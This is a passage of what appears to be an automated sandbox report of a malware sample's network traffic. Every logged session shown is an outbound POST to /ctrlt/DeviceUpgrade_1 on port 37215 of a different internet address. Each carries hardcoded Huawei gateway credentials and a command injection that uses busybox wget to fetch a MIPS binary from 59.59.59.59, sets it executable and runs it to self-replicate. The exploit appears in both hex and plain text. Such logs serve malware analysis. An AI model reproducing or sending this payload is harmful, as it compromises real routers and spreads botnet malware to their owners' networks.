2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          290192.168.2.154728453.33.147.22637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533751011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          291192.168.2.1558884197.146.4.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533766031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          292192.168.2.154014241.207.67.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533790112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          293192.168.2.1551520157.120.184.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533807039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          294192.168.2.1546632157.155.146.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.534003973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          295192.168.2.154367041.74.1.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.534019947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          296192.168.2.1539198184.58.11.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.534039021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          297192.168.2.153312497.176.206.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.534063101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          298192.168.2.1549188197.22.91.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.534081936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          299192.168.2.153497241.65.147.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.534102917 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          300192.168.2.1555450197.80.122.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.534121990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
